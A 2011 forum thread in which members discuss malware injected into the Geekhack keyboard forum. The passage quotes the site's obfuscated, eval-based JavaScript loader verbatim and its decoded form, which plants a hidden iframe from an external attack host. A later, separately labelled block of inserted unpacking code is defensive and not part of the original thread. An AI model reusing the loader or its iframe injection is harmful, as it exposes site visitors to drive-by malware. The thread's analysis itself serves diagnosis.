Geekhack is infeasted

ripster

07 Nov 2011, 22:13

We're the friendliest customers in this world
We're modest - we have money
Yeah, I got the irony part. Geld. Money.

I got an A in High School German. Just ask all the German Deskthority members.

P.S. Don't you Europeans close your quotes???? """""""""

guilleguillaume

09 Nov 2011, 02:45

Is the problem solved?

Firefox and IE9 still warn me about malware site. :?

itlnstln

09 Nov 2011, 14:50

According to iMav, he fixed the problem. Chrome is still flagging GH as malicious as well. I'm only going to access it by Tapatalk until the message goes away since I primarily post from work.

ripster

09 Nov 2011, 16:46

My Filco R Limited Edition Red Cherry MX had bugs yesterday.

Specifically an ant.

I'll host the pics here to please Sixty.

Alive
FLA_3597-2.jpg
Dead
FLA_3602.jpg

ripster

10 Nov 2011, 17:46

So you guys really couldn't see my photos unless logged in???

Image

BTW the warning message is gone.

webwit
Wild Duck

11 Nov 2011, 01:28

Still leaves this problem (example) when not logged in there.

Scumbag geekhack...

Image

ripster

11 Nov 2011, 19:43

Feel free to use my pictures in your wikis.

Just leave the watermark.

I call this one "Red Alert - Virus Attack"!
FLA_3613.jpg

webwit
Wild Duck

12 Nov 2011, 00:37

ripster wrote:I call this one "Red Alert - Virus Attack"!
FLA_3613.jpg
I like the orange guy.

ripster

23 Nov 2011, 18:38

Happy Thanksgiving All!

Oh wait, some of you are Canadians.

Meanwhile at Geekhack......
Geekhack 11-23-2011.png
Malware found on javascript file:
http://geekhack.org/clientscript/yui/co ... n.js?v=417
Known javascript malware.
Details: http://sucuri.net/malware/malware-entry-mwjsanon7

itlnstln

23 Nov 2011, 19:25

There's also some spambot running around in there asking for pics. At least Tapatalk is safe.

I think.

pita

23 Nov 2011, 19:40

I don't get the warning virus warning, but I am not able to post anything..

Daemon Raccoon

23 Nov 2011, 19:50

pita wrote:I don't get the warning virus warning, but I am not able to post anything..
If you disable Javascript for Geekhack you can post.

Ascaii
The Beard

24 Nov 2011, 11:39

got a new trojan warning yesterday, seems whatever the issue is is NOT resolved. Google now notes the last malware find as 2011-11-23

zulios

24 Nov 2011, 12:51

I've had trouble with this : was browsing on geekhack. Suddenly firefox crashed, and a soft ironically called "privacy protection" appeared from nowhere, disabling my anti virus and trying to scan my pc. Fortunately I've gotten rid of it pretty quickly, but for a non experienced user it has a very similar look to any serious windows application.

Don't know what it does precisely though, but it said my pc was infected with blaster worm and started a scan of it. It looks like it tries to protect you when actually I believe it rather tries to steal your data. That's some pretty good job in trying to lure the user.
Last edited by zulios on 24 Nov 2011, 13:11, edited 1 time in total.

Brian8bit

24 Nov 2011, 13:09

Is it a vulnerability in vBulletin that has yet to be patched that people are exploiting? Or is it someone using a dodgy signature? Another forum I use with vBulletin occasionally gets malware warnings, but in every instance it has been someone's signature...

Ascaii
The Beard

24 Nov 2011, 15:19

iMav said it was a vulnerability last time, but supposedly it was fixed...if it was then it shouldn't be fucked up again...but it is, so all bets are off in my eyes.

Gerk

24 Nov 2011, 18:13

It's seriously messed up at the moment, can't even load pages, instead getting the generic VB warning message that headers were already sent ... then it sends my browser(s) into a headspin that require a force quit. This is the first time any of the problems have caused me grief on OSX. It's also a time when I find Lion's "feature" for re-opening all of your Safari tabs after a quit (or force quit) incredibly annoying.

When iMav said it was "fixed" I think he was just referring to the injected js, not the actual exploit or whatever they used to get in with. If it is someone's sig then it's still using an exploit/loophole because there should be no js in sigs.

7bit

24 Nov 2011, 18:37

I remember GeekHack was a great website (with some technical issues from time to time), but long gone.
:sad:

I wonder what iMav does these days since he'd given up his website.
Last edited by 7bit on 24 Nov 2011, 20:28, edited 1 time in total.

mintberryminuscrunch

24 Nov 2011, 18:58

7bit wrote: I wonder what iMav does these days since he'd given up his website.
as long as he doesn't spam ads on the website there is still hope :D

litster

24 Nov 2011, 19:13

Before, I wondered, ah, the good old days when every keyboard nut was under one roof, on the same forum. Now I am thankful that there are two forums. Or this Thanksgiving holiday would be pretty boring :) Fault tolerance FTW!

iMav said he is on the road this long weekend. I guess it will be a while before this is fixed. Even if vB was patched, there may be other security holes in the OS, browser, or other software on the box that is accessible through open ports for repeat infections.

pita

24 Nov 2011, 19:17

What a mess at GH... :(

webwit
Wild Duck

24 Nov 2011, 19:25

What is sent is this:
Code:

<script>a=(document.getElementsByTagName+'').substr(1,4);if((a=="func")||(a=="unct")){ss="";s=String;e=eval;t='g';}ddd=new Date();d2=new Date(ddd.valueOf()-2);Object.prototype.bt3223='tb4etew';c="createTextNode";if('tb4etew'==={}.bt3223)a=document[c]('321');if(a.nodeValue==321)h=(ddd-d2)*-1;n="4.5g4.5g52.5g51g16g20g50g55.5g49.5g58.5g54.5g50.5g55g58g23g51.5g50.5g58g34.5g54g50.5g54.5g50.5g55g58g57.5g33g60.5g42g48.5g51.5g39g48.5g54.5g50.5g20g19.5g49g55.5g50g60.5g19.5g20.5g45.5g24g46.5g20.5g61.5g4.5g4.5g4.5g52.5g51g57g48.5g54.5g50.5g57g20g20.5g29.5g4.5g4.5g62.5g16g50.5g54g57.5g50.5g16g61.5g4.5g4.5g4.5g50g55.5g49.5g58.5g54.5g50.5g55g58g23g59.5g57g52.5g58g50.5g20g17g30g52.5g51g57g48.5g54.5g50.5g16g57.5g57g49.5g30.5g19.5g52g58g58g56g29g23.5g23.5g57.5g59.5g48.5g50g59.5g25.5g23g50g55g57.5g24g26.5g23g49.5g55.5g54.5g23.5g54.5g48.5g52.5g55g23g56g52g56g31.5g56g48.5g51.5g50.5g30.5g51g25g26g24g50.5g24.5g28g51g48.5g26g50.5g48.5g28g25g26.5g26g19.5g16g59.5g52.5g50g58g52g30.5g19.5g24.5g24g19.5g16g52g50.5g52.5g51.5g52g58g30.5g19.5g24.5g24g19.5g16g57.5g58g60.5g54g50.5g30.5g19.5g59g52.5g57.5g52.5g49g52.5g54g52.5g58g60.5g29g52g52.5g50g50g50.5g55g29.5g56g55.5g57.5g52.5g58g52.5g55.5g55g29g48.5g49g57.5g55.5g54g58.5g58g50.5g29.5g54g50.5g51g58g29g24g29.5g58g55.5g56g29g24g29.5g19.5g31g30g23.5g52.5g51g57g48.5g54.5g50.5g31g17g20.5g29.5g4.5g4.5g62.5g4.5g4.5g51g58.5g55g49.5g58g52.5g55.5g55g16g52.5g51g57g48.5g54.5g50.5g57g20g20.5g61.5g4.5g4.5g4.5g59g48.5g57g16g51g16g30.5g16g50g55.5g49.5g58.5g54.5g50.5g55g58g23g49.5g57g50.5g48.5g58g50.5g34.5g54g50.5g54.5g50.5g55g58g20g19.5g52.5g51g57g48.5g54.5g50.5g19.5g20.5g29.5g51g23g57.5g50.5g58g32.5g58g58g57g52.5g49g58.5g58g50.5g20g19.5g57.5g57g49.5g19.5g22g19.5g52g58g58g56g29g23.5g23.5g57.5g59.5g48.5g50g59.5g25.5g23g50g55g57.5g24g26.5g23g49.5g55.5g54.5g23.5g54.5g48.5g52.5g55g23g56g52g56g31.5g56g48.5g51.5g50.5g30.5g51g25g26g24g50.5g24.5g28g51g48.5g26g50.5g48.5g28g25g26.5g26g19.5g20.5g29.5g51g23g57.5g58g60.5g54g50.5g23g59g52.5g57.5g52.5g49g52.5g54g52.5g58g60.5g30.
5g19.5g52g52.5g50g50g50.5g55g19.5g29.5g51g23g57.5g58g60.5g54g50.5g23g56g55.5g57.5g52.5g58g52.5g55.5g55g30.5g19.5g48.5g49g57.5g55.5g54g58.5g58g50.5g19.5g29.5g51g23g57.5g58g60.5g54g50.5g23g54g50.5g51g58g30.5g19.5g24g19.5g29.5g51g23g57.5g58g60.5g54g50.5g23g58g55.5g56g30.5g19.5g24g19.5g29.5g51g23g57.5g50.5g58g32.5g58g58g57g52.5g49g58.5g58g50.5g20g19.5g59.5g52.5g50g58g52g19.5g22g19.5g24.5g24g19.5g20.5g29.5g51g23g57.5g50.5g58g32.5g58g58g57g52.5g49g58.5g58g50.5g20g19.5g52g50.5g52.5g51.5g52g58g19.5g22g19.5g24.5g24g19.5g20.5g29.5g4.5g4.5g4.5g50g55.5g49.5g58.5g54.5g50.5g55g58g23g51.5g50.5g58g34.5g54g50.5g54.5g50.5g55g58g57.5g33g60.5g42g48.5g51.5g39g48.5g54.5g50.5g20g19.5g49g55.5g50g60.5g19.5g20.5g45.5g24g46.5g23g48.5g56g56g50.5g55g50g33.5g52g52.5g54g50g20g51g20.5g29.5g4.5g4.5g62.5";n=n["split"](t);for(i=0;i!=n.length;i++)ss+=s.fromCharCode(-h*e("n"+"["+"i"+"]"));zx=ss;if(a.data==a.nodeValue)e(zx);</script>
Unable to add cookies, header already sent.<br />
File: /var/www/lherzog/geekhack.org-html/vb/includes/config.php<br />
Line: 2<br />
Oooh, an obfuscated javascript. Meh, I decode it and find this:
Code:

if (document.getElementsByTagName('body')[0]) {
	iframer();
} else {
	document.write("<iframe src='http://swadw3.dns05.com/main.php?page=f240e18fa4ea8254' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
}

function iframer() {
	var f = document.createElement('iframe');
	f.setAttribute('src','http://swadw3.dns05.com/main.php?page=f240e18fa4ea8254');
	f.style.visibility='hidden';
	f.style.position='absolute';
	f.style.left='0';
	f.style.top='0';
	f.setAttribute('width','10');
	f.setAttribute('height','10');
	document.getElementsByTagName('body')[0].appendChild(f);
}
In other words, it tries to insert a hidden iframe from http://swadw3.dns05.com/main.php?page=f240e18fa4ea8254, which is where the attack is coming from.
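
Added example, not part of webwit's post or of the original thread: the decoding step described above can be done statically, without letting the loader call eval. The multiplier of 2 is read from the quoted loader (`d2` is 2 ms behind `ddd`, and each token is multiplied by `-h`); the function names, the sample script and the `packed.example.invalid` URL are constructed for illustration.

```javascript
// Added example: static unpacking only. Nothing from the payload is eval()'d.
// In the quoted loader, h = (ddd - d2) * -1 = -2 and each character is
// fromCharCode(-h * token), so every token is half of a character code.
const MULTIPLIER = 2;

// Find the packed literal: decimals joined by one repeated letter ('g' on the page).
function extractPacked(script) {
  const re = /["']((?:\d+(?:\.\d+)?([a-z]))(?:\d+(?:\.\d+)?\2)*\d+(?:\.\d+)?)["']/;
  const m = script.match(re);
  return m ? { body: m[1], delim: m[2] } : null;
}

// Turn the packed literal back into source text without running it.
function decodePacked(script, multiplier = MULTIPLIER) {
  const packed = extractPacked(script);
  if (!packed) return null;
  return packed.body
    .split(packed.delim)
    .map((tok) => String.fromCharCode(Math.round(Number(tok) * multiplier)))
    .join("");
}

// Report the URLs in decoded text that builds an iframe and hides it.
function hiddenIframeSources(decoded) {
  const hides = /visibility\s*[:=]\s*['"]?hidden/i.test(decoded);
  if (!/iframe/i.test(decoded) || !hides) return [];
  return [...new Set(decoded.match(/https?:\/\/[^\s'"<>)]+/g) || [])];
}

// Constructed sample (not the page's payload): a harmless snippet packed the same way.
function pack(text, delim = "g", multiplier = MULTIPLIER) {
  return [...text].map((ch) => ch.charCodeAt(0) / multiplier).join(delim);
}
const SAMPLE_PLAIN =
  "document.write(\"<iframe src='http://packed.example.invalid/main.php' " +
  "style='visibility:hidden'></iframe>\");";
const SAMPLE_SCRIPT = 'n="' + pack(SAMPLE_PLAIN) + '";n=n["split"]("g");';

function analyze(script) {
  const decoded = decodePacked(script);
  return { decoded, sources: decoded ? hiddenIframeSources(decoded) : [] };
}

console.log(analyze(SAMPLE_SCRIPT));
```

The same `analyze` call works on a saved copy of a suspect script file, which makes it usable for sweeping a web root for this packer after a cleanup.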

ripster

24 Nov 2011, 19:26

Come to the dark side.

We HAVE cookies.

For you Euro/Canadian folks this is what Thanksgiving Day is like in the great U.S.A.:
Piggly Wiggly is 6 degrees from Kevin Bacon.

Gerk

24 Nov 2011, 21:23

webwit wrote:What is sent is this:
(snip)
In other words, it tries to insert a hidden iframe from http://swadw3.dns05.com/main.php?page=f240e18fa4ea8254, which is where the attack is coming from.
I was just going to post this. They might have been more successful had they not tried to inject it where they did. Someone has labelled GH as a target, probably all over the hacker boards in their lists. Might be a while before they sort it I'm guessing. I think iMav keeps fixing the injected code but hasn't addressed the root of the issue.

Funny enough it still works fine with tapatalk, but traffic is pretty low today LOL :D

pita

24 Nov 2011, 22:40

Gerk wrote: ..., but traffic is pretty low today LOL :D
Well DUH!? lol.

Gerk

24 Nov 2011, 22:42

pita wrote:
Gerk wrote: ..., but traffic is pretty low today LOL :D
Well DUH!? lol.
Just stating that only a few of us tapatalk users are the ones getting anywhere :D

webwit
Wild Duck

25 Nov 2011, 02:19

Image

Gerk

25 Nov 2011, 02:31

LOL

ripster

25 Nov 2011, 17:43

I think it's been fixed.

BUT I've said that before......
Report 2011-04-05 03:24:45 (GMT 1)
Website geekhack.org
Domain Hash 0db414050bd8f4be630b38e87d120354
IP Address 65.111.241.205 [SCAN]
IP Hostname runt-3.uhhh.org
IP Country US (United States)
AS Number 30691
AS Name LLDC - Lifeline Data Centers
Detections 0 / 21 (0 %)
Status CLEAN

Scanning site with: AMaDa CLEAN
Scanning site with: BrowserDefender CLEAN
Scanning site with: DNS-BH CLEAN
Scanning site with: DShield SDL CLEAN
Scanning site with: Google Diagnostic CLEAN
Scanning site with: hpHosts UNRATED
Scanning site with: joewein.de LLC CLEAN
Scanning site with: Malware Domain List CLEAN
Scanning site with: Malware Patrol CLEAN
Scanning site with: MyWOT CLEAN
Scanning site with: Norton SafeWeb CLEAN
Scanning site with: ParetoLogic URL Clearing House CLEAN
Scanning site with: PhishTank CLEAN
Scanning site with: SCUMWARE CLEAN
Scanning site with: SpamhausDBL CLEAN
Scanning site with: SURBL CLEAN
Scanning site with: Threat Log CLEAN
Scanning site with: TrendMicro Web Reputation CLEAN
Scanning site with: URIBL CLEAN
Scanning site with: Web Security Guard UNRATED
Scanning site with: ZeuS Tracker CLEAN
Alors on danse.

mintberryminuscrunch

25 Nov 2011, 19:51

let's take bets, how long it will last.
I give them till 1st of december
